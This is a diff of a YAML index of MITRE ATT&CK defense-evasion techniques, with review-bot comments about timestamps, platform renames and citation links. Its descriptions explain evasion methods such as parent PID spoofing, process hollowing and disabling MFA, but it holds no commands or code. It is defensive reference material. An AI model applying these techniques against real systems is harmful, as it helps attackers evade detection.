+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
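Review bot: inside the re-emitted `external_references` for T1497.002 the only content change is the Deloitte entry, whose URL gains an `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) and whose retrieval date moves to September 13, 2024. A Google Drive `/edit` link is not a stable citation target; mirroring it from upstream is acceptable for the index, but it should not be relied on as a verified source anywhere else in this repo. The `x_mitre_modified_by_ref` line added here simply replaces the one removed from its earlier position, so there is no net change there.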
@@ -10279,7 +10381,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -10304,7 +10406,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -10375,7 +10476,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -10402,11 +10503,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -10460,7 +10560,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -10496,7 +10595,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -10522,8 +10621,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -10549,7 +10646,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -10571,8 +10668,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -10638,12 +10733,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -10698,7 +10792,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -10846,7 +10939,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: Disable Carbon Black Response
@@ -10987,7 +11079,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -11022,8 +11114,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -11089,7 +11179,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -11115,7 +11204,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -11140,11 +11229,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -11161,7 +11249,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11171,7 +11258,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -11180,19 +11267,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
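Review bot: the `x_mitre_platforms` list for T1078 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (with `x_mitre_version` going from 2.6 to 2.7), and T1556.006 later in the patch receives the same rename. Any per-platform index or test filter in this repo that matches on the old platform strings will silently stop matching these techniques, so those artifacts need regenerating in the same PR, and the commit message should name the upstream platform consolidation so the diff is not read as a removal of cloud coverage.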
@@ -11240,11 +11325,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -11312,18 +11398,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
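Review bot: the `Leitch Hollowing` reference swaps `http://www.autosectools.com/process-hollowing.pdf` for `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf` and re-dates the retrieval to September 12, 2024. That reads as a link-rot fix inherited from upstream, but the new URL is a third-party upload directory rather than the author's site, so before it is cited anywhere in this repo's own documentation confirm the mirrored PDF is the same paper; the `x_mitre_attack_spec_version` bump to 3.2.0 in the same hunk is consistent with the rest of the patch.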
@@ -11370,7 +11455,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -11392,7 +11477,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -11467,6 +11551,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -11526,7 +11611,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
@@ -11564,7 +11648,7 @@ defense-evasion:
name: sh
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -11593,24 +11677,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -11645,9 +11731,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -11670,7 +11753,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -11688,8 +11771,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -11728,7 +11809,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -11771,10 +11852,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
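Review bot: the new T1027.014 (Polymorphic Code) entry arrives with `atomic_tests: []` and `x_mitre_detection: ''`, so it is a placeholder in the defense-evasion index, which is expected for an upstream sync. Two things to note: the `description` carries upstream's stray whitespace (`polymorphic-sentinelone) \n` mid-string and a trailing `\n`), which will churn again if the generator ever normalises strings, and since `x_mitre_platforms` lists Windows, macOS and Linux, the corresponding platform indexes should gain the same entry in this PR so they do not diverge from the tactic index.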
@@ -11818,7 +11967,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -11843,8 +11992,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -11875,7 +12022,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
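Review bot: `modified` for Network Boundary Bridging moves backwards here, from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:05:44.200Z`, and the same regression shows up below for T1548.004, T1218.010, T1574.009, T1218.009, VBA Stomping and T1197. That looks like the index was regenerated from an ATT&CK data source whose timestamps were not normalized the way the previous one's were; it may well be correct, but say so in the commit message, because any downstream merge that keeps the entry with the newer `modified` will treat these as stale and retain the old copies.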
@@ -11894,7 +12041,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -11989,11 +12135,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -12073,11 +12218,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -12142,12 +12286,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -12196,8 +12339,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -12212,14 +12355,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -12231,7 +12373,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -12261,13 +12403,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
